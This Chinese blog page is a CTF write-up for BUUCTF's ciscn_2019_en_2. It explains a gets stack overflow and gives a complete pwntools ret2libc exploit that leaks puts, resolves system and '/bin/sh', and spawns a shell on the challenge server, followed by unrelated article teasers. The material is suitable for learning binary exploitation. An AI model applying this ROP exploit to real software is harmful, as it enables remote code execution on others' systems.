news 2026/3/10 5:40:06

buuctf中的ciscn_2019_en_2

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
buuctf中的ciscn_2019_en_2

首先checksec检查保护机制:

-64位程序

-开启了栈不可执行保护

接下来使用IDA反汇编工具进行分析:

发现begin函数,点进去

begin函数内部:

输入1可用进入encrypt函数,输入2可从主函数看到并没有什么用,3是退出程序

这是encrypt函数内部:

get函数可触发栈溢出漏洞,看到这一行代码就可用了,下面的加密过程对破解程序无任何帮助。顺便算出s到栈底的偏移:0x50+0x8 = 0x58

由于在IDA中没发现任何后门函数和system函数地址,所以这里考虑泄露libc后来得到system函数和/bin/sh,这里我们需要构造ROP链来调用函数,所以还需用到ret和rdi的地址,输入以下指令:

ROPgadget --binary pwn --only "pop|ret"

rdi地址:0x400c83,ret地址:0x4006b9,q其中rdi用于调用函数,ret用于栈对齐

再在IDA中拿到encrypt地址,用于第一次泄露libc后再次进入encrypt函数:0x4009A0

基本信息拿到,可用来写exp攻击脚本了:

from pwn import * from LibcSearcher import LibcSearcher context(arch='amd64', os='linux', log_level='debug') #io = process('./pwn') # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io = connect('node5.buuoj.cn',28902) # 与在线环境交互。 encrypt_addr = 0x4009A0 offset = 0x58 elf = ELF('./pwn') puts_got = elf.got['puts'] puts_plt = elf.plt['puts'] rdi_addr = 0x400c83 ret_addr = 0x4006b9 io.recvuntil(b'Input your choice!\n') io.sendline(b'1') io.recvuntil(b'Input your Plaintext to be encrypted\n') payload = b'a'*offset + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(encrypt_addr) io.sendline(payload) io.recvline() io.recvline() puts_addr = u64(io.recvline().strip().ljust(8,b'\x00')) print(hex(puts_addr)) libc = LibcSearcher('puts',puts_addr) libc_base = puts_addr - libc.dump('puts') system_addr = libc_base + libc.dump('system') bin_sh_addr = libc_base + libc.dump('str_bin_sh') io.recvuntil(b'Input your Plaintext to be encrypted\n') payload = b'a'*offset + p64(ret_addr) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr) io.sendline(payload) io.interactive()

这是运行结果:

这里需要手动选择libc,64位程序就选64位的libc,可能会选到不适配的libc库,多试几次就可用了,拿到shell后手动输入cat flag拿到flag

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/7 21:27:44

SG-TCP232-620(六通道串口服务器)特点与功能介绍

一、核心定位与工作模式SG-TCP232-620 是工业级多通道串口转网口设备,核心功能是实现 6 路串口(可独立配置为 RS232/422/485 模式)与以太网数据的双向透明传输,支持多设备级联扩展,解决多串口设备的集中联网与远程数据…

作者头像 李华
网站建设 2026/3/6 9:28:03

Leetcode 80 统计一个数组中好对子的数目

1 题目 1814. 统计一个数组中好对子的数目 给你一个数组 nums ,数组中只包含非负整数。定义 rev(x) 的值为将整数 x 各个数字位反转得到的结果。比方说 rev(123) 321 , rev(120) 21 。我们称满足下面条件的下标对 (i, j) 是 好的 : 0 &l…

作者头像 李华
网站建设 2026/3/7 23:00:34

Linux 笔记:rpm命令

Linux 中 RPM 命令详解RPM(Red Hat Package Manager)是 Red Hat 及其衍生发行版(如 CentOS、Fedora 等)中用于安装、卸载、查询和管理软件包的工具。基本语法rpm [选项] 包名安装软件包rpm -i 包文件名-i:表示安装&…

作者头像 李华
网站建设 2026/3/4 7:00:11

提示工程架构师如何用“用户反馈循环”优化提示内容,提升体验?

提示工程架构师如何用「用户反馈循环」优化提示内容:从痛点到闭环的全流程指南 一、引言:为什么提示优化需要「用户反馈循环」? 1. 提示工程的「隐形痛点」:你写的提示,用户真的能用吗? 作为提示工程架构师…

作者头像 李华
网站建设 2026/3/7 23:01:51

前端工程化面试题,零基础入门到精通,收藏这篇就够了

一、HTML 常见题目 01、Doctype作用?严格模式与混杂模式如何区分?它们有何意义? 02、HTML5 为什么只需要写 ? 03、行内元素有哪些?块级元素有哪些? 空(void)元素有那些? 04、页面导入样式时&#xff0…

作者头像 李华
网站建设 2026/3/10 1:46:21

Kotaemon能否用于宠物护理建议?兽医知识普及场景

Kotaemon在宠物护理与兽医知识普及中的应用探索 当一只猫咪连续三天不吃不喝,主人往往手足无措:是该立刻冲向急诊,还是先观察一晚?网络搜索出来的答案五花八门,真假难辨;电话咨询兽医又担心小题大做、浪费资…

作者头像 李华